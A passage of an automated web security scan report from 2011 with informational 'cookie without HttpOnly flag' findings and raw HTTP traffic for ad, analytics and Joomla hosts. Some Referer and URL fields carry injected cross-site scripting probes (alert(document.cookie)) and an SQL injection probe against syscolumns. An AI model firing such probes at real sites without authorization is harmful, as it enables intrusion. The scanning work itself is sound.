vstcnt=3lebnns021l034e2061201181qq4fhux122q000000axzm000000d1t30d1rq0d1qh0d1te000000d1ss0d1px0d1s00d1t20d1sn0d1rp0d1rb0d1t40d1rr0d1s70d1qu0d1q60d1ps0d1r70d1pu0d1rf0d1r10d1r40d1qx0d1ql0d1pr0d1r60d1sm0d1r90d1pw0d1qw0d1qc0d1sr0d1qz0d1sq0d1se0d1rm0d1qj0d1rg0d1t90d1rw0d1pl0d1qe0d1q50d1rc0d1q20d1so0d1t00d1ro0d1su0d1sd0d1qa0d1tb0d1qv0d1s10d1qo0d1r00d1s40d1qi0d1t80d1tf0d1st0d1py0d1rh0d1rd0d1sz0d1qm0d1q40d1q10d1r80d1pv0d1rk0d1s20d1sk0d1tc0d1rj0d1qb0d1pm0d1r20d1sc0d1rl0d1qg0d1ta0d1rt0d1t50d1rs0d1r30d1pq0d1si0d1t70d1sj0d1ru0000000000000004esx7120104tej0r013ik5120o0keqa0pk2n0kh4a0kh3u0kh490kh3s0kh3t0kh3m0kh3a0kh3y0kh3j0kh3h0kh390kh3x0kh3v0kh4b0kh3d0kh3f0kh3r0kh3l0kh430kh3g0kh3p0kh3z; Domain=media6degrees.com; Expires=Sat, 23-Jul-2011 21:08:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.243. http://d1.openx.org/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1480
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.244. http://d1.openx.org/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/afr.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
OAVARS[a2bb8a70]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434133%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121960%22%3B%7D; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /afr.php?n=a2bb8a70&zoneid=121960&target=_blank&cb=416587824 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a2bb8a70]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434133%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121960%22%3B%7D; path=/
Content-Length: 1482
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

14.245. http://d1.openx.org/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:01 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?zoneid=17099&cb=49902098508&charset=UTF-8&loc=http%3A//www.netlingo.com/ HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

14.246. http://d1.openx.org/lg.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=254472&campaignid=98644&zoneid=17099&cb=a2563a7fcc&r_id=dda27c0e92ce176b4b94dc8a5861a24c&r_ts=lfk34d HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.netlingo.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:05:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:05:02 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.247. http://delb.opt.fimserve.com/fimbid/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://delb.opt.fimserve.com
Path:	/fimbid/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

UI="284ab5a022ca529df|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; Domain=.opt.fimserve.com; Expires=Fri, 22-Jan-2021 02:05:10 GMT; Path=/
RTB=|2937.l.931830; Domain=delb.opt.fimserve.com; Expires=Tue, 01-Feb-2011 02:05:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.248. http://demo.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: demo.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/download.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.8.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:21:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:21:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en-gb"
lang="en-gb"
...[SNIP]...

14.249. http://demo16.cloudaccess.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

0d4018dcd0961c57d0d37c72abf6777f=0jc68bdosfv0usmfgmt3kojis0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.250. http://demo16.cloudaccess.net/administrator/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://demo16.cloudaccess.net
Path:	/administrator/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

3cd367566174a1f3a2f806869f69204d=tfi2vmv2kpu2qbp7plrssh0ha6; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /administrator/index.php HTTP/1.1
Host: demo16.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.251. http://developer.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

39f24a85b5d169a21046edfe6eaa5320=b8b89065d54bf1f5350847d3395c6862; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=b8b89065d54bf1f5350847d3395c6862; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.252. http://developer.joomla.org/security.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

39f24a85b5d169a21046edfe6eaa5320=8e5282eafc51b03f82cb3101599587e0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security.html HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:02 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=8e5282eafc51b03f82cb3101599587e0; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.253. http://developer.joomla.org/security/news.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developer.joomla.org
Path:	/security/news.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

39f24a85b5d169a21046edfe6eaa5320=112a50d273cc4d78fe17a308d34dcf53; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /security/news.html HTTP/1.1
Host: developer.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:02:04 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 SVN/1.6.6
X-Powered-By: PHP/5.2.13
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: 39f24a85b5d169a21046edfe6eaa5320=112a50d273cc4d78fe17a308d34dcf53; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...

14.254. http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/1596198292@x23

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

RMFM=011PhXovU106w2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.mookie1.com
NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.255. http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/11596989115@x92

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/11596989115@x92? HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; session=1295919344|1295919344; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1549
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

14.256. http://dm.de.mookie1.com/2/B3DM/DLX/@x94 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/DLX/@x94

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/B3DM/DLX/@x94 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://mig.nexac.com/2/B3DM/DLX/1@x96
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; NXCLICK2=011Pbk1ANX_CasaleB3/ATTWL/11Q1/MobRONRTG/300/1243587456!y!90!Ayp!Cly; id=914803576615380; RMFL=011PfKJbU106t6; RMFM=011PhXovU106w2; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660; session=1295919344|1295919348; dlx_7d=set

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:29:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 915
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660;path=/

<script>
var oas_d=new Date();
var oas_m=oas_d.getTime();

oas_d.setTime(oas_m+86400000);
document.cookie="dlx_20100929=set;expires="+oas_d.toGMTString()+";path=/;domain=.mookie1.com";

oas_d.s
...[SNIP]...

14.257. http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dominionenterprises.112.2o7.net
Path:	/b/ss/deparenthood/1/H.15.1/s24211537942755

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|269F1A080515A595-600001A8000031B7[CE]; Expires=Sun, 24 Jan 2016 02:23:12 GMT; Domain=dominionenterprises.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/deparenthood/1/H.15.1/s24211537942755?[AQB]&ndh=1&t=24/0/2011%2020%3A23%3A13%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&g=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&r=http%3A//burp/show/57&cc=USD&ch=www.parenthood.com&events=event1&c1=Data%20Not%20Available&v1=Data%20Not%20Available&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&v4=First%20page%20view%20or%20cookies%20not%20supported&v5=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: dominionenterprises.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE]

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:23:12 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F1A080515A595-600001A8000031B7[CE]; Expires=Sun, 24 Jan 2016 02:23:12 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
Location: http://dominionenterprises.112.2o7.net/b/ss/deparenthood/1/H.15.1/s24211537942755?AQB=1&pccr=true&vidn=269F1A080515A595-600001A8000031B7&&ndh=1&t=24/0/2011%2020%3A23%3A13%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&g=http%3A//www.parenthood.com/%3Fd1907%27-alert%28document.cookie%29-%27807a8eb3eff%3D1&r=http%3A//burp/show/57&cc=USD&ch=www.parenthood.com&events=event1&c1=Data%20Not%20Available&v1=Data%20Not%20Available&c2=Data%20Not%20Available&v2=Data%20Not%20Available&c3=Data%20Not%20Available&v3=Data%20Not%20Available&v4=First%20page%20view%20or%20cookies%20not%20supported&v5=Parenting%2C%20Pregnancy%2C%20Baby%20Names%2C%20Online%20Parenting%20Articles%20%26%20More%20-%20Parenthood.com&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.3.1
Expires: Mon, 24 Jan 2011 02:23:12 GMT
Last-Modified: Wed, 26 Jan 2011 02:23:12 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 0
Content-Type: text/plain

14.258. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.21/s27710598513465 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dominionenterprises.112.2o7.net
Path:	/b/ss/desoundings/1/H.21/s27710598513465

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|269F1B3305160AA7-600001A2A004A9AA[CE]; Expires=Sun, 24 Jan 2016 02:33:10 GMT; Domain=dominionenterprises.112.2o7.net; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/desoundings/1/H.21/s27710598513465?AQB=1&ndh=1&t=24/0/2011%2020%3A33%3A10%201%20360&ce=ISO-8859-1&ns=dominionenterprises&pageName=Buying%20a%20Boat%3F%20Search%20on%20Soundingsonline.com&g=http%3A//www.soundingsonline.com/index.php%3Foption%3Dcom_content%26view%3Dcategory%26layout%3Dblog%26id%3D%27%252B%2520%28select%2Bconvert%28int%2CCHAR%2895%29%252BCHAR%2833%29%252BCHAR%2864%29%252BCHAR%2850%29%252BCHAR%28100%29%252BCHAR%28105%29%252BCHAR%28108%29%252BCHAR%28101%29%252BCHAR%28109%29%252BCHAR%28109%29%252BCHAR%2897%29%29%2BFROM%2Bsyscolum&cc=USD&ch=www.soundingsonline.com&events=event1%2Cevent2&c1=D%3Dg&v1=D%3Dg&c2=1&v2=1&c3=monday%7C9%3A30pm&v3=monday%7C9%3A30pm&c4=New&v4=New&c5=First%20Visit&v5=First%20Visit&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1192&bh=688&ct=lan&hp=N&AQE=1 HTTP/1.1
Accept: */*
Referer: http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&Itemid=111
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: dominionenterprises.112.2o7.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 02:33:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|269F1B3305160AA7-600001A2A004A9AA[CE]; Expires=Sun, 24 Jan 2016 02:33:10 GMT; Domain=dominionenterprises.112.2o7.net; Path=/
